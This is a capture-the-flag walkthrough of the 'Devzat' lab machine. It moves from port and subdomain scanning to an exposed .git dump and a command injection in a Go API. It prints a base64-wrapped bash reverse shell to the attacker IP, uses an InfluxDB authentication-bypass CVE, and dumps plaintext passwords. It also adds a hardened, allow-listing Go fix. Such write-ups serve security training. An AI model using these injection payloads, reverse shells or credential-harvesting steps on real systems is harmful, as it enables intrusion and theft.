1. IP Address

# Machine address
10.10.11.118

# Local address
10.10.14.140

2. Nmap

nmap -sV -sC -oA nmap/devzat 10.10.11.118
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-17 03:09 EST
Nmap scan report for 10.10.11.118
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
|   256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_  256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://devzat.htb/
8000/tcp open  ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-Go
| ssh-hostkey: 
|_  3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.91%I=7%D=2/17%Time=620E02E2%P=x86_64-pc-linux-gnu%r(NU
SF:LL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.28 seconds

Open ports: 22/tcp ssh (OpenSSH 8.2p1), 80/tcp http (Apache 2.4.41), 8000/tcp ssh (Go SSH server)

3. Nikto

nikto -h 10.10.11.118
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.11.118
+ Target Hostname:    10.10.11.118
+ Target Port:        80
+ Start Time:         2022-02-17 03:11:03 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://devzat.htb/
+ No CGI Directories found (use '-C all' to force check all possible dirs)

Add devzat.htb to /etc/hosts

4. Gobuster

gobuster dir -u http://devzat.htb -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://devzat.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/02/17 03:20:16 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 309] [--> http://devzat.htb/images/]
/assets               (Status: 301) [Size: 309] [--> http://devzat.htb/assets/]
/javascript           (Status: 301) [Size: 313] [--> http://devzat.htb/javascript/]
Progress: 31191 / 220561 (14.14%)                                                 ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/02/17 03:32:56 Finished
===============================================================

5. Ffuf

ffuf -c -u http://devzat.htb/ -H "Host: FUZZ.devzat.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200

-mc: Match HTTP status codes, or “all” for everything. (default: 200,204,301,302,307,401,403,405,500)

________________________________________________

 :: Method           : GET
 :: URL              : http://devzat.htb/
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.devzat.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

pets                    [Status: 200, Size: 510, Words: 20, Lines: 21]
:: Progress: [4989/4989] :: Job [1/1] :: 165 req/sec :: Duration: [0:00:33] :: Errors: 0 ::

Add pets.devzat.htb to /etc/hosts

ffuf -u http://pets.devzat.htb/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -fs 510

-fs: Filter HTTP response size. Comma separated list of sizes and ranges

ffuf v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : http://pets.devzat.htb/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 510
________________________________________________

css                     [Status: 301, Size: 40, Words: 3, Lines: 3]
build                   [Status: 301, Size: 42, Words: 3, Lines: 3]
server-status           [Status: 403, Size: 280, Words: 20, Lines: 10]
.git                    [Status: 301, Size: 41, Words: 3, Lines: 3]
:: Progress: [43003/43003] :: Job [1/1] :: 165 req/sec :: Duration: [0:04:24] :: Errors: 0 ::

.git directory is exposed on pets.devzat.htb

6. .git Dump and Extract

## Download GitTools:
# https://github.com/internetwache/GitTools/releases/tag/v0.0.1
tar zxvf gitTools-v0.0.1.tgz

Dumper:

gitdumper.sh http://pets.devzat.htb/.git/ pets

Extractor:

./extractor.sh pets pets_dump
total 0
drwxr-xr-x 1 ca4mi ca4mi 252 Feb 17 04:41 .
drwxr-xr-x 1 ca4mi ca4mi 114 Feb 17 04:42 ..
drwxr-xr-x 1 ca4mi ca4mi 160 Feb 17 04:41 0-ef07a04ebb2fc92cf74a39e0e4b843630666a705
drwxr-xr-x 1 ca4mi ca4mi 160 Feb 17 04:41 1-8274d7a547c0c3854c074579dfc359664082a8f6
drwxr-xr-x 1 ca4mi ca4mi 160 Feb 17 04:41 2-464614f32483e1fde60ee53f5d3b4d468d80ff62

main.go (from the extracted repository):

// species comes straight from the JSON body of POST /api/pet and is
// concatenated, unsanitized, into a command run through "sh -c":
// command injection.
func loadCharacter(species string) string {
        cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
        stdoutStderr, err := cmd.CombinedOutput()
        if err != nil {
                return err.Error()
        }
        return string(stdoutStderr)
}
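The fix for this class of bug is to drop the shell entirely and allow-list the input before it touches the filesystem. The following is an added example, not code from the Devzat repository: it assumes a hypothetical `characteristics/` directory of plain files keyed by species name, and shows a hardened replacement for `loadCharacter` that rejects shell metacharacters and path traversal alike.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
)

// A species name is a short lowercase alphabetic token. Anything else
// (";", "|", "/", "..", spaces) is rejected before any file access.
var speciesPattern = regexp.MustCompile(`^[a-z]{1,32}$`)

var errBadSpecies = errors.New("invalid species name")

// ValidSpecies reports whether a user-supplied species is safe to use
// as a file name under the characteristics directory.
func ValidSpecies(species string) bool {
	return speciesPattern.MatchString(species)
}

// LoadCharacterSafe is a hardened replacement for loadCharacter: no shell
// is spawned, the input is allow-listed, and the path is built with
// filepath.Join so it stays inside dir.
func LoadCharacterSafe(dir, species string) (string, error) {
	if !ValidSpecies(species) {
		return "", errBadSpecies
	}
	data, err := os.ReadFile(filepath.Join(dir, species))
	if err != nil {
		return "", err
	}
	return string(data), nil
}

func main() {
	// Constructed inputs: a legitimate name, a shell-injection attempt
	// shaped like the one on this page, and a traversal attempt.
	for _, s := range []string{"cat", "cat; echo x | bash", "../etc/passwd"} {
		_, err := LoadCharacterSafe("characteristics", s)
		fmt.Printf("%-22q valid=%-5v err=%v\n", s, ValidSpecies(s), err)
	}
}
```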

7. Reverse Shell

sudo tcpdump -i tun0 icmp

Output:

05:20:18.743591 IP devzat.htb > 10.10.14.140: ICMP echo request, id 4, seq 354, length 64                                      
05:20:18.743613 IP 10.10.14.140 > devzat.htb: ICMP echo reply, id 4, seq 354, length 64                                        
05:20:19.202056 IP devzat.htb > 10.10.14.140: ICMP echo request, id 2, seq 428, length 64                                      
05:20:19.202078 IP 10.10.14.140 > devzat.htb: ICMP echo reply, id 2, seq 428, length 64                                        
05:20:19.245840 IP devzat.htb > 10.10.14.140: ICMP echo request, id 6, seq 112, length 64                                      
05:20:19.245862 IP 10.10.14.140 > devzat.htb: ICMP echo reply, id 6, seq 112, length 64                                        
05:20:19.432060 IP devzat.htb > 10.10.14.140: ICMP echo request, id 1, seq 1547, length 64                                     
05:20:19.432137 IP 10.10.14.140 > devzat.htb: ICMP echo reply, id 1, seq 1547, length 64 

Encode the payload as base64:

## Encode to base64
echo -n 'bash -i>& /dev/tcp/10.10.14.140/9001 0>&1' | base64
## /copy the output/
YmFzaCAtaT4mIC9kZXYvdGNwLzEwLjEwLjE0LjE0MC85MDAxIDA+JjE=
## Listen on port 9001
nc -lvnp 9001

Intercept the request in Burp and decode it with base64 -d inside the injected command:

POST /api/pet HTTP/1.1
Host: pets.devzat.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://pets.devzat.htb/
Content-Type: text/plain;charset=UTF-8
Origin: http://pets.devzat.htb
Content-Length: 82
DNT: 1
Connection: close
Sec-GPC: 1

{"name":"fg","species":"cat; echo -n YmFzaCAtaT4mIC9kZXYvdGNwLzEwLjEwLjE0LjE0MC85MDAxIDA+JjE= | base64 -d | bash"}

id:

patrick@devzat:~/pets
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick)

7.1 Shell stabilization:

python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl+z

stty raw -echo

fg [enter enter] to return to the nc session

export TERM=xterm

catherine

8. Exploitation

Local VM:

# start an HTTP server
python3 -m http.server

Machine VM:

8.1 linpeas

curl 10.10.14.140:8000/linpeas.sh -o linpeas.sh
## make it executable
chmod +x linpeas.sh

Results:

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8086          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:5000          0.0.0.0:*               LISTEN      898/./petshop       
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::8000                 :::*                    LISTEN      897/./devchat 

8.2 Chisel

### Download
chisel_1.7.7_linux_amd64.gz
## decompress
gzip -d chisel_1.7.7_linux_amd64.gz
mv chisel_1.7.7_linux_amd64 chisel
chmod +x chisel
## fetch it on the Machine VM
curl 10.10.14.140:8000/chisel -o chisel

Local VM:

./chisel server -p 3477 --reverse
2022/02/17 06:27:13 server: Reverse tunnelling enabled
2022/02/17 06:27:13 server: Fingerprint IXk1H0yZ/WxP4FYsKS66U8CMaC7XAZgNC/Lh84a3XkI=
2022/02/17 06:27:13 server: Listening on http://0.0.0.0:3477
2022/02/17 06:27:38 server: session#1: tun: proxy#R:8086=>8086: Listening

Machine VM:

./chisel client 10.10.14.140:3477 R:8086:127.0.0.1:8086
2022/02/17 11:27:37 client: Connecting to ws://10.10.14.140:3477
2022/02/17 11:27:39 client: Connected (Latency 239.707911ms)

8.3 Nmap scan:

nmap -p 8086 -sV 127.0.0.1
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-17 06:29 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0076s latency).

PORT     STATE SERVICE VERSION
8086/tcp open  http    InfluxDB http admin 1.7.5

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.72 seconds

8.4 CVE-2019-20933 (InfluxDB 1.7.5 authentication bypass)

Host (default: localhost): 
Port (default: 8086): 
Username <OR> path to username file (default: users.txt): /opt/SecLists/Usernames/Names/names.txt
[v] admin

Host vulnerable !!!

Databases:

1) devzat
2) _internal

.quit to exit
[admin@127.0.0.1] Database: devzat

Starting InfluxDB shell - .back to go back
[admin@127.0.0.1/devzat] $ 

SELECT * FROM "user":

{                                                                                                                              
    "results": [                                                                                                               
        {                                                                                                                      
            "series": [                                                                                                        
                {                                                                                                              
                    "columns": [                                                                                               
                        "time", 
                        "enabled",
                        "password",
                        "username"
                    ],
                    "name": "user",
                    "values": [ 
                        [
                            "2021-06-22T20:04:16.313965493Z",
                            false,
                            "WillyWonka2021",
                            "wilhelm"
                        ],
                        [
                            "2021-06-22T20:04:16.320782034Z",
                            true,
                            "woBeeYareedahc7Oogeephies7Aiseci", 
                            "catherine"
                        ],
                       [
                            "2021-06-22T20:04:16.996682002Z",
                            true,
                            "RoyalQueenBee$",
                            "charles"
                        ]
                    ]
                }
            ],
            "statement_id": 0
        }
    ]
}
su - catherine
woBeeYareedahc7Oogeephies7Aiseci

user.txt:

433d81******

9. Enumeration

linpeas.sh

#)You_can_write_even_more_files_inside_last_directory

/var/backups/devzat-dev.zip
/var/backups/devzat-main.zip
/var/crash
/var/tmp

Unzip:

unzip devzat-dev.zip
unzip devzat-main.zip
# check what differs between the two versions
diff main/commands.go dev/commands.go

Output:

>       // Check my secure password
>       if pass != "CeilingCatStillAThingIn2021?" {
>               u.system("You did provide the wrong password")
>               return
>       }

ssh -l test localhost -p 8443

root.txt:

fd3fb39c**********